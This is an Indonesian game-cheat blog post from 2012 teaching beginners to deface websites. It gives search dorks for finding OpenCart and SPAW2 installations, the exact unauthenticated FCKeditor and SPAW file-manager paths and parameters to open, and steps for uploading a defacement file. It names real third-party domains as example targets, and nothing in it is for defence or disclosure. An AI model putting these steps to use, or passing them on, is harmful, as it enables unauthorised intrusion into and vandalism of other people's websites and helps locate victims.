Add Me On Facebook


Hi Cheaterz, Selamat datang di Point Blank Cheaterz. Follow blog ini untuk mendapatkan informasi terbaru. Dan jika ada masalah silahkan memberikan komentar. Terima Kasih. Salam Cheaterz

Opening Video

Share It

Rabu, 11 Januari 2012

Deface Website Menggunakan OpenCart dan SPAW File Manager Untuk Para Pemula 2012

Rabu, Januari 11, 2012 PB-C No comments

Kalian tentu tahu kan apa itu Deface Website??
Memang deface website sangat sulit tapi disini saya akan mengajarkan agan bagaimana deface website untuk para pemula..
Langsung aja deh ke TKP !!


DEFACE WEBSITE DENGAN OPENCART
 
dork nya :
SUPORT BY OPENCART
atau
"Powered By OpenCart" site:com (com nya bisa agan ganti,seperti my,il, dll yang penting suport opencart)

langsung ke caranya,,

Pertama-tama agan cari dulu script code-nya. Kalo banyak yang ga ngerti comment yah !! Nanti akan saya share cara membuat script code..

Langkah selanjutnya..
jika agan sudah mendapatkan target nya (Harus support dengan OpenCart)

contoh target http://www.digitalbazzar.co.uk/shop bisa juga www.digitalbazzar.co.uk/cart
www.digitalbazzar.co.uk/patch dll

klo udah dapet targetnya tinggal kita inject exploitnya :
admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html (Tambahkan di belakang nya)
Cth :
http://target.co.uk/
ubah jadi http://target.co.uk/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

Perhatikan gambar berikut :

Ganti ASP jadi PHP, lalu kamu masukin file deface kamu,jika berhasil maka ada bacaan alert seperti ini "file uploaded with no errors"

untuk melihat apakan berhasil di upload atau tidak kamu ke "Get Folders and Files" dan lihat hasilnya... :)
dan lihat belakangnya.
Cth belakangnya : /Hacked.html

Jadi hasilnya begini : http://target.co.uk/hacked.html

DEFACE DENGAN SPAW FILE MANAGER
Dork :
inurl:spaw2/dialogs/ atau inurl:spaw2/uploads/files/
POC
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2 &lang=es&charset=&scid=cf73b58bb51c52235494da75 2d9 8cac9

jika sudah menemukan targetnya contoh seperti ini :
http://olgabz.com/spaw2/dialogs/

lalu agan ganti spaw2/dialogs/
dengan
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2 &lang=es&charset=&scid=cf73b58bb51c52235494da75 2d9 8cac9

jadinya kya gini http://olgabz.com/spaw2/dialogs/dial...a752d9%208cac9

nanti akan muncul SPAW File Manager,lihat gambar di bawah ini :

jangan lupa ganti type nya dari image ke File,dan agan tinggal upload file agan..
jika sudah trus di apain...??

trus agan lihat file kamu sudah masuk blom seperti gambar di bawah ini:
 


lalu bagaimana cara melihat hasil deface kita???
cara nya,agan klick file yg sudah agan upload,nanti akan ada tulisan download file di sebelah kanan,,dan agan klick,.

Inilah hasilnya yang sudah saya buat :

Note :
Jika ingin copas silahkan masukan sumbernya yaitu : http://serba-cheat-pointblank.blogspot.com/

Posted in:

0 komentar:

Posting Komentar

Berkomentarlah dengan sopan dan bijak !!

RSS FeedSubscribe
Follow Us on Twitter!Follow Us